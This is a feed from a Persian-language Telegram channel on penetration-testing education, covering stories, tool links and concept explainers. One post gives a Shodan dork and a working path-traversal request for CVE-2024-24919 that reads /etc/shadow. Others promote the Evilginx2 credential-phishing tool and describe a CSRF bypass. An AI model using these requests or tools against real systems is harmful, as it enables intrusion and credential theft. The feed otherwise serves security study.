Try Hack Box – Telegram
Try Hack Box
5.78K subscribers
682 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
Forwarded from TryHackBox Story
⚠️ نفوذگران هنگام تلاش برای هک شرکت شما چه خطری را تهدید می کنند؟ قسمت 1.

• داستان دو نفوذگر (گری و جاستین) در مورد اینکه چگونه یک روز یک ممیزی امنیتی برای آنها انجام شد. متخلفان ورودی ساختمان و زیرساخت های فناوری اطلاعات دادگاه را هک کردند و تنها چند ساعت بعد خود را در آنجا یافتند اما به عنوان متهم:

• یک هفته برای یک پروژه جدید اختصاص داده شد، نفوذگران تقریباً کارت سفید کامل داشتند - آنها می توانستند هر کاری انجام دهند: از کلیدهای اصلی استفاده کنند، از در پشتی عبور کنند، ظروف زباله را حفر کنند، درایوهای فلش را وصل کنند. تنها کاری که آنها از انجام آن منع شده بودند، خاموش کردن سیستم هشدار بود.

• تعهدات آزمایش کنندگان در 28 صفحه نوشته شد. بیمه در برابر دستگیری فهرستی از افرادی بود - کارمندان سیستم دادگاه آیووا - که از این روند آگاه بودند و می توانستند ثابت کنند که مجرمان مجرم نیستند.

• اولین روز پروژه یک هفته ای بدون حادثه گذشت. پنتسترها شبانه وارد ساختمان شدند و از نشانه هایی از مشکلات امنیتی که پیدا کردند عکس گرفتند. آنها کارت ویزیت خود را روی میز مشتری گذاشتند تا دلیلی بر این باشد که آنها داخل شدند و او را از تمام یافته های خود مطلع کردند.

• تماس بعدی سه شنبه بود و درهای طبقاتی که جلسات دادگاه برگزار می شد برای همان شب تعیین شده بود. در اول به راحتی تسلیم شد، اما در دومی مشکلاتی به وجود آمد - مکانیزم امنیتی پنهانی داشت که نفوذگران آن را نمی دیدند. در راه، آنها همچنین اتاقی با مانیتورهای تمام دوربین های امنیتی که می توانستند وارد شوند، پیدا کردند. از دوربین ها دیدند که یک افسر امنیتی در راهروها قدم می زند. برای جلوگیری از گرفتار شدن، نفوذگران از پوشش در "نقاط کور" استفاده کردند و سپس به آزمایش ادامه دادند. اما نه برای مدت طولانی - زنگ هشدار به صدا درآمد. معلوم شد که درهای طبقه ای که از آن عبور کرده بودند قفل مانده بود. علیرغم این واقعیت که زنگ هشدار به صدا درآمد، متخلفان وظایف خود را برای آن شب انجام دادند و با یادآوری اینکه چگونه از سرویس امنیتی در انبوهی از چیزها پنهان شده بودند، خندیدند.

• با گذشت زمان، آنها به بازرسی دادگاه دیگری ادامه دادند. وقتی می خواستند وارد شوند، معلوم شد که درب آن باز است. آنها او را هل دادند، اما آلارم به صدا درآمد. پس از چندین بار تلاش برای بیدار کردن زنگ، آنها تصمیم گرفتند در را ببندند تا طبق وظیفه خود نفوذ کنند. و به محض اینکه شروع به باز کردن آن کردند، یک سیگنال هشدار و سپس یک زنگ واقعی شنیدند. این اتفاق به قدری سریع رخ داد که زمانی برای وارد کردن کد امنیتی برای متوقف کردن زنگ هشدار وجود نداشت. آنقدر فریاد زد که تمام شهر می شنیدند. پناهجویان فقط می توانستند منتظر پلیس باشند....

#داستان
@TryHackBoxStory
🔥3
🔑 اعتبارات پیش فرض.

• رمزهای عبور پیش فرض در دستگاه های شبکه رایج تر از آن چیزی است که در نگاه اول به نظر می رسد. در اینترنت، صدها روتر نه تنها برای کاربران خصوصی، بلکه برای شبکه های شرکتی با پورت های باز وجود دارد.

• در اینجا پیوندی به مخزن وجود دارد که حاوی تعداد زیادی ترکیب استاندارد ورود/گذرواژه است که در بسیاری از دستگاه ها و سرویس ها استفاده می شود:

➡️ https://github.com/ihebski/DefaultCreds-cheat-sheet

• اطلاعات هم برای تیم قرمز و هم برای تیم آبی مفید خواهد بود.

@TryHackBox
👍1
Media is too big
VIEW IN TELEGRAM
لینوکس برای هکرهای اخلاقی (2022 - دوره کامل کالی لینوکس ).
480p
@TryHackBox
👍1🔥1
آسیب پذیری ATO چیست؟

به طور خلاصه به جعل کردن یوزرنیم و پسورد یه کاربر و وارد شدن به حساب کاربری اون، ATO یا همون (Account Takeover) می‌گن. اگه به بیشتر خوندن علاقه دارید، این مقاله خیلی مفیده.

خلاصه مقاله معرفی شده که AI نوشته است:

تصاحب حساب کاربری (Account Takeover یا ATO) نوعی حمله سایبری است که در آن مهاجمان با استفاده از اطلاعات ورودی دزدیده‌شده مانند نام کاربری و رمز عبور، به حساب‌های آنلاین کاربران دسترسی پیدا می‌کنند. این اطلاعات معمولاً از طریق حملات مهندسی اجتماعی، نشت داده‌ها و حملات فیشینگ به دست می‌آید و سپس درt وب تاریک خریداری می‌شود. مهاجمان با استفاده از این اطلاعات، ربات‌هایی را برای تست ترکیبات مختلف رمز عبور و نام کاربری به کار می‌گیرند تا بتوانند به حساب‌های کاربری در سایت‌های مختلف مانند مالی، تجارت الکترونیک و شبکه‌های اجتماعی دسترسی پیدا کنند.

مجرمان سایبری پس از تأیید اطلاعات حساب‌ها، این اطلاعات را می‌فروشند یا از آنها برای سوءاستفاده از حساب‌ها استفاده می‌کنند. این حملات نوعی سرقت هویت به شمار می‌آیند.

یکی از دلایل موفقیت این حملات، عدم تغییر منظم رمزهای عبور توسط کاربران و استفاده مجدد از جزئیات ورود به سیستم در سایت‌های مختلف است. مهاجمان می‌توانند با استفاده از ابزارهای اتوماتیک حملات جستجوی فراگیر و پر کردن اطلاعات کاربری (Credential Stuffing) را انجام دهند.

این نوع حملات به ویژه در مؤسسات مالی خطرناک است زیرا می‌تواند به سرقت مستقیم پول از حساب‌های کاربری منجر شود. برای مقابله با این حملات، مؤسسات می‌توانند از روش‌های مختلفی مانند تأیید هویت چندعاملی (MFA)، سیستم‌های ردیابی حساب و فناوری‌های مبتنی بر هوش مصنوعی استفاده کنند. همچنین، استفاده از فایروال‌های برنامه‌های وب (WAF) برای شناسایی و مسدود کردن ترافیک مخرب می‌تواند به جلوگیری از حملات ATO کمک کند.
By -> imem!
Media is too big
VIEW IN TELEGRAM
پایتون برای مبتدیان - دوره کامل.
480p
@TryHackBox
آیا می‌دانید URN چیست؟

درواقع URN یا (نام یکنواخت منابع) یکی از انواع URI است که به عنوان یک نام یکتا و پایدار برای یک منبع خاص عمل می‌کند، بدون توجه به مکانی که این منبع در آن قرار دارد. این به این معناست که یک URN می‌تواند برای شناسایی یک منبع خاص استفاده شود حتی اگر مکان فیزیکی یا الکترونیکی آن منبع تغییر کند.

تفاوت URN با URL چیست؟

برخلاف URL (یک نوع دیگر از URI)، که مکان دقیق یک منبع را شامل می‌شود (مانند آدرس وب سایت)، URN بیشتر به عنوان یک شناسه ثابت و یکتا عمل می‌کند که با تغییر مکان منبع، ثابت باقی می‌ماند. برای مثال، یک URN می‌تواند یک سند یا کتاب را شناسایی کند بدون اینکه نیاز باشد مکان دقیق آن سند یا کتاب مشخص شود.

چالش‌های استفاده از URN

استفاده از URN‌ها همچنان در مرحله‌ی آزمایشی قرار دارد و به طور گسترده‌ای پذیرفته نشده است. برای کارکرد موثر URN‌ها، نیاز به یک زیرساخت پشتیبان وجود دارد که بتواند مکان منابع را مشخص کند. عدم وجود چنین زیرساختی، مانعی برای پذیرش گسترده URN‌ها بوده است. اما URN‌ها پتانسیل جالبی برای آینده دارند.
Ethical_Hacking_in_15_Hours_2023_Edition_Learn_to_Hack_3FNYvj2U0HM.mp4
313.2 MB
هک اخلاقی در 15 ساعت - نسخه 2023 - آموزش هک کردن! (قسمت 1)؛
480p
@TryHackBox
👍1
🖥 Evilginx2
- ابزار فیشینگ

ابزاری است که برای انجام حملات فیشینگ و گرفتن اطلاعات کاربری طراحی شده است. این به شما امکان می دهد وب سایت های جعلی ایجاد کنید که برای رهگیری ورود کاربران، رمز عبور و سایر داده های حساس استفاده می شود.

- این ابزار فرصت های زیادی را برای انجام حملات فیشینگ فراهم می کند، از جمله:

1. ایجاد صفحات وب جعلی برای سرویس های آنلاین محبوب.
2. تجزیه و تحلیل جلسات کاربر.
3. اتوماسیون پروسس گرفتن اعتبار.

https://github.com/kgretzky/evilginx2

#Phishing
@TryHackBox
در حال حاضر ما هیچ دوره ای نداریم ولی در نظر داریم یک بخش خرید اشتراکی ایجاد کنیم تا شما عزیزان بتوانید در دوره های معتبر فارسی شرکت کنید و از آموزش بهره ببرید .
آیا موافق برگزاری خرید اشتراکی هستید ؟
Final Results
61%
بله
39%
خیر
👎5👍2
این بحث خرید اشتراکی بخاطر درخواست چند نفر از شما عزیزان بوده وگر نه ما همچین چیزی تا بحال نداشتیم .
🔥1
Media is too big
VIEW IN TELEGRAM
هک اخلاقی در 15 ساعت - نسخه 2023 - آموزش هک کردن! (قسمت 2)؛
@TryHackBox
1
This media is not supported in your browser
VIEW IN TELEGRAM
🖥 IntelOwl
- تجزیه و تحلیل تهدید شبکه

یک ابزار تحقیقاتی باز است که به تجزیه و تحلیل تهدیدهای مختلف امنیت اطلاعات کمک می کند. قابلیت جمع آوری، تجزیه و تحلیل و تجسم اطلاعات در مورد تهدیدات احتمالی مانند فایل های مخرب، URL ها، آدرس های IP و دامنه ها را فراهم می کند.

- این ابزار به شما امکان می دهد انواع مختلفی از تجزیه و تحلیل را انجام دهید، مانند:
1. تجزیه و تحلیل استاتیک فایل ها.
2. جستجوی اطلاعات در مورد تهدیدات در منابع باز.
3. آدرس های IP و دامنه ها را برای اتصالات با تهدیدات شناخته شده بررسی کنید.
https://github.com/intelowlproject/IntelOwl
#Recon
@TryHackBox
1👍1
Try Hack Box pinned «در حال حاضر ما هیچ دوره ای نداریم ولی در نظر داریم یک بخش خرید اشتراکی ایجاد کنیم تا شما عزیزان بتوانید در دوره های معتبر فارسی شرکت کنید و از آموزش بهره ببرید .
آیا موافق برگزاری خرید اشتراکی هستید ؟
»
🥷 AskHackers Search
- ابزار جستجوی هوش مصنوعی بر اساس داده‌های Hacker News!

هکر نیوز یک منبع قابل اعتماد و محبوب برای آخرین اخبار و گزارش های فنی در مورد امنیت سایبری و هک است.

اکنون پاسخ سوالات شما در جستجوی AskHackers بر اساس نظرات موجود در آنجا خواهد بود و در اصل، می توانید از هکرهای سراسر جهان بپرسید.

‌‌https://askhackers.com/
@TryHackBox
This media is not supported in your browser
VIEW IN TELEGRAM
افزایش دسترسی لینوکس برای مبتدیان
@TryHackBox
🖥 TLS Prober
- تجزیه و تحلیل TLS

ابزاری است که به طور خاص برای تجزیه و تحلیل امنیتی پروتکل TLS طراحی شده است.

- این ابزار قابلیت اسکن امنیت TLS را دارد. این به شناسایی نقاط ضعف در تنظیمات TLS کمک می کند و توانایی بهبود امنیت اطلاعات ارسال شده را فراهم می کند.

https://github.com/WestpointLtd/tls_prober

#Tools #Network
@TryHackBox
🖥 مخزن: DFTDC
- غیرفعال کردن تله متری

این مجموعه ای از تنظیمات مختلف در صفحه گزینه های فایرفاکس است که به به حداقل رساندن ارسال تله متری و جمع آوری داده ها کمک می کند.

- توضیح مهم: پس از استفاده از مخزن، با تغییر این تنظیمات، فایرفاکس همچنان داده ها را جمع آوری و به سرورهای خود ارسال می کند، اما در مقادیر بسیار کمتر.


https://github.com/K3V1991/Disable-Firefox-Telemetry-and-Data-Collection
#Firefox #Data #Telemetry
@TryHackBox
همه در مورد CVE-2024-24919 می نویسند و ما در مورد آن خواهیم نوشت.

🔍 Dork for Shodan: noscript:"Check Point" ssl:"target"

عملیات👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

#CVE
@TryHackBox
💡 یک دور زدن ساده CSRF برای بررسی اینکه آیا تارگت شما داده های JSON را بدون توکن ضد CSRF ارسال می کند یا خیر

نوع محتوا را از application/json به text/plain تغییر دهید و ببینید آیا همچنان درخواست را می‌پذیرد یا خیر.

#tips #bugbounty
@TryHackBox
Try Hack Box pinned Deleted message